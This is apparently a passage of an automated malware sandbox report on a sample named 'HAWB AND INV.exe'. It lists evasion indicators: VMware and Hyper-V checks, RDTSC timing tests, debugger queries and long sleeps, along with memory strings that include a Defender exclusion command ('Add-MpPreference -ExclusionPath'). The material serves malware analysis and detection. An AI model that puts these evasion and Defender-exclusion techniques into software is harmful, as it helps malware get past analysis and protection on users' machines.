          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: HAWB AND INV.exe PID: 6752, type: MEMORY
          Source: Yara matchFile source: 0.2.HAWB AND INV.exe.2d0f5ac.1.raw.unpack, type: UNPACKEDPE
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000001185E4 second address: 00000000001185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 000000000011896E second address: 0000000000118974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_004088A0 rdtsc 10_2_004088A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_009745A8 sldt word ptr [eax]0_2_009745A8
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4137Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3031Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4167Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2752Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4731
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1801
          Source: C:\Users\user\Desktop\HAWB AND INV.exe TID: 6756Thread sleep time: -101846s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exe TID: 6796Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep count: 4167 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep count: 2752 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4532Thread sleep count: 43 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5536Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep count: 4731 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep count: 1801 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5688Thread sleep count: 47 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6876Thread sleep time: -22136092888451448s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread delayed: delay time: 101846Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: powershell.exe, 00000004.00000003.475227153.00000000059ED000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.539404811.0000000005332000.00000004.00000001.sdmpBinary or memory string: Hyper-V
          Source: explorer.exe, 0000000B.00000000.410165765.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000000.410406652.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000002.615205318.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 0000000B.00000000.396565510.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 0000000B.00000000.396565510.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.410165765.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000B.00000000.407965163.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000B.00000000.407965163.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000B.00000000.410406652.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: powershell.exe, 00000004.00000003.475227153.00000000059ED000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.539404811.0000000005332000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 0000000B.00000002.594031738.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_004088A0 rdtsc 10_2_004088A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00409B10 LdrLoadDll,10_2_00409B10
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120513A mov eax, dword ptr fs:[00000030h]10_2_0120513A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120513A mov eax, dword ptr fs:[00000030h]10_2_0120513A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9100 mov eax, dword ptr fs:[00000030h]10_2_011D9100
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9100 mov eax, dword ptr fs:[00000030h]10_2_011D9100
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9100 mov eax, dword ptr fs:[00000030h]10_2_011D9100
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]10_2_011F4120
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]10_2_011F4120
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]10_2_011F4120
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]10_2_011F4120
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov ecx, dword ptr fs:[00000030h]10_2_011F4120
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FB944 mov eax, dword ptr fs:[00000030h]10_2_011FB944
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FB944 mov eax, dword ptr fs:[00000030h]10_2_011FB944
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB171 mov eax, dword ptr fs:[00000030h]10_2_011DB171
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB171 mov eax, dword ptr fs:[00000030h]10_2_011DB171
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DC962 mov eax, dword ptr fs:[00000030h]10_2_011DC962
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012061A0 mov eax, dword ptr fs:[00000030h]10_2_012061A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012061A0 mov eax, dword ptr fs:[00000030h]10_2_012061A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012569A6 mov eax, dword ptr fs:[00000030h]10_2_012569A6
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]10_2_012551BE
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]10_2_012551BE
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]10_2_012551BE
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]10_2_012551BE
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FC182 mov eax, dword ptr fs:[00000030h]10_2_011FC182
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A185 mov eax, dword ptr fs:[00000030h]10_2_0120A185
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202990 mov eax, dword ptr fs:[00000030h]10_2_01202990
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012641E8 mov eax, dword ptr fs:[00000030h]10_2_012641E8
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB1E1 mov eax, dword ptr fs:[00000030h]10_2_011DB1E1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB1E1 mov eax, dword ptr fs:[00000030h]10_2_011DB1E1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB1E1 mov eax, dword ptr fs:[00000030h]10_2_011DB1E1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]10_2_0120002D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]10_2_0120002D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]10_2_0120002D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]10_2_0120002D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]10_2_0120002D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257016 mov eax, dword ptr fs:[00000030h]10_2_01257016
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257016 mov eax, dword ptr fs:[00000030h]10_2_01257016
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257016 mov eax, dword ptr fs:[00000030h]10_2_01257016
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]10_2_011EB02A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]10_2_011EB02A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]10_2_011EB02A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]10_2_011EB02A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A4015 mov eax, dword ptr fs:[00000030h]10_2_012A4015
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A4015 mov eax, dword ptr fs:[00000030h]10_2_012A4015
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F0050 mov eax, dword ptr fs:[00000030h]10_2_011F0050
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F0050 mov eax, dword ptr fs:[00000030h]10_2_011F0050
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01292073 mov eax, dword ptr fs:[00000030h]10_2_01292073
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A1074 mov eax, dword ptr fs:[00000030h]10_2_012A1074
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]10_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012190AF mov eax, dword ptr fs:[00000030h]10_2_012190AF
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9080 mov eax, dword ptr fs:[00000030h]10_2_011D9080
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120F0BF mov ecx, dword ptr fs:[00000030h]10_2_0120F0BF
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120F0BF mov eax, dword ptr fs:[00000030h]10_2_0120F0BF
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120F0BF mov eax, dword ptr fs:[00000030h]10_2_0120F0BF
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01253884 mov eax, dword ptr fs:[00000030h]10_2_01253884
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01253884 mov eax, dword ptr fs:[00000030h]10_2_01253884
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D58EC mov eax, dword ptr fs:[00000030h]10_2_011D58EC
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]10_2_0126B8D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov ecx, dword ptr fs:[00000030h]10_2_0126B8D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]10_2_0126B8D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]10_2_0126B8D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]10_2_0126B8D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]10_2_0126B8D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129131B mov eax, dword ptr fs:[00000030h]10_2_0129131B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DF358 mov eax, dword ptr fs:[00000030h]10_2_011DF358
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01203B7A mov eax, dword ptr fs:[00000030h]10_2_01203B7A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01203B7A mov eax, dword ptr fs:[00000030h]10_2_01203B7A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DDB40 mov eax, dword ptr fs:[00000030h]10_2_011DDB40
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8B58 mov eax, dword ptr fs:[00000030h]10_2_012A8B58
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DDB60 mov ecx, dword ptr fs:[00000030h]10_2_011DDB60
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204BAD mov eax, dword ptr fs:[00000030h]10_2_01204BAD
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204BAD mov eax, dword ptr fs:[00000030h]10_2_01204BAD
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204BAD mov eax, dword ptr fs:[00000030h]10_2_01204BAD
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A5BA5 mov eax, dword ptr fs:[00000030h]10_2_012A5BA5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E1B8F mov eax, dword ptr fs:[00000030h]10_2_011E1B8F
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E1B8F mov eax, dword ptr fs:[00000030h]10_2_011E1B8F
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129138A mov eax, dword ptr fs:[00000030h]10_2_0129138A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128D380 mov ecx, dword ptr fs:[00000030h]10_2_0128D380
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120B390 mov eax, dword ptr fs:[00000030h]10_2_0120B390
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202397 mov eax, dword ptr fs:[00000030h]10_2_01202397
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]10_2_012003E2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]10_2_012003E2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]10_2_012003E2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]10_2_012003E2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]10_2_012003E2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]10_2_012003E2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012553CA mov eax, dword ptr fs:[00000030h]10_2_012553CA
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012553CA mov eax, dword ptr fs:[00000030h]10_2_012553CA
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FDBE9 mov eax, dword ptr fs:[00000030h]10_2_011FDBE9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F3A1C mov eax, dword ptr fs:[00000030h]10_2_011F3A1C
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DAA16 mov eax, dword ptr fs:[00000030h]10_2_011DAA16
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DAA16 mov eax, dword ptr fs:[00000030h]10_2_011DAA16
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01214A2C mov eax, dword ptr fs:[00000030h]10_2_01214A2C
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01214A2C mov eax, dword ptr fs:[00000030h]10_2_01214A2C
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov eax, dword ptr fs:[00000030h]10_2_011D5210
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov ecx, dword ptr fs:[00000030h]10_2_011D5210
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov eax, dword ptr fs:[00000030h]10_2_011D5210
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov eax, dword ptr fs:[00000030h]10_2_011D5210
